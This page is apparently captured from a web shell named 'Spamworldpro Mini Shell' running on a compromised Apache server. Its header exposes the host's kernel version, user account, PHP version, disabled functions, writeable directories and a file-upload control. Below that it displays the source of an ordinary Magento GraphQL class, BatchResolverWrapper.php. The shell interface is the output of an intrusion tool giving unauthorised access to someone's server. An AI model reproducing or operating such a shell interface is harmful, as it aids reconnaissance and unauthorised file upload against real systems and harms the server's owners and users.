Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/old/vendor/magento/framework/GraphQl/Query/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/old/vendor/magento/framework/GraphQl/Query/BatchResolverWrapper.php
<?php
/**
 * Copyright © Magento, Inc. All rights reserved.
 * See COPYING.txt for license details.
 */
declare(strict_types=1);

namespace Magento\Framework\GraphQl\Query;

use Magento\Framework\GraphQl\Config\Element\Field;
use Magento\Framework\GraphQl\Query\Resolver\BatchRequestItemInterface;
use Magento\Framework\GraphQl\Query\Resolver\BatchResolverInterface;
use Magento\Framework\GraphQl\Query\Resolver\BatchResponse;
use Magento\Framework\GraphQl\Query\Resolver\ResolveRequest;
use Magento\Framework\GraphQl\Query\Resolver\ValueFactory;
use Magento\Framework\GraphQl\Schema\Type\ResolveInfo;

/**
 * Wrapper containing batching logic for BatchResolverInterface.
 */
class BatchResolverWrapper implements ResolverInterface
{
    /**
     * @var BatchResolverInterface
     */
    private $resolver;

    /**
     * @var ValueFactory
     */
    private $valueFactory;

    /**
     * @var \Magento\Framework\GraphQl\Query\Resolver\ContextInterface|null
     */
    private $context;

    /**
     * @var Field|null
     */
    private $field;

    /**
     * @var BatchRequestItemInterface[]
     */
    private $request = [];

    /**
     * @var BatchResponse|null
     */
    private $response;

    /**
     * BatchResolverWrapper constructor.
     * @param BatchResolverInterface $resolver
     * @param ValueFactory $valueFactory
     */
    public function __construct(BatchResolverInterface $resolver, ValueFactory $valueFactory)
    {
        $this->resolver = $resolver;
        $this->valueFactory = $valueFactory;
    }

    /**
     * Clear aggregated data.
     *
     * @return void
     */
    private function clearAggregated(): void
    {
        $this->response = null;
        $this->request = null;
        $this->context = null;
        $this->field = null;
    }

    /**
     * Find resolved data for given request.
     *
     * @param BatchRequestItemInterface $item
     * @throws \Throwable
     * @return mixed
     */
    private function findResolvedFor(BatchRequestItemInterface $item)
    {
        try {
            return $this->resolveFor($item);
        } catch (\Throwable $exception) {
            $this->clearAggregated();
            throw $exception;
        }
    }

    /**
     * Resolve branch/leaf for given item.
     *
     * @param BatchRequestItemInterface $item
     * @return mixed|\Magento\Framework\GraphQl\Query\Resolver\Value
     * @throws \Throwable
     */
    private function resolveFor(BatchRequestItemInterface $item)
    {
        if (!$this->request) {
            throw new \RuntimeException('Unknown batch request item');
        }

        if (!$this->response) {
            $this->response = $this->resolver->resolve($this->context, $this->field, $this->request);
        }

        return $this->response->findResponseFor($item);
    }

    /**
     * @inheritDoc
     */
    public function resolve(Field $field, $context, ResolveInfo $info, array $value = null, array $args = null)
    {
        if ($this->response) {
            $this->clearAggregated();
        }

        $item = new ResolveRequest($field, $context, $info, $value, $args);
        $this->request[] = $item;
        $this->context = $context;
        $this->field = $field;

        return $this->valueFactory->create(
            function () use ($item) {
                return $this->findResolvedFor($item);
            }
        );
    }
}

Spamworldpro Mini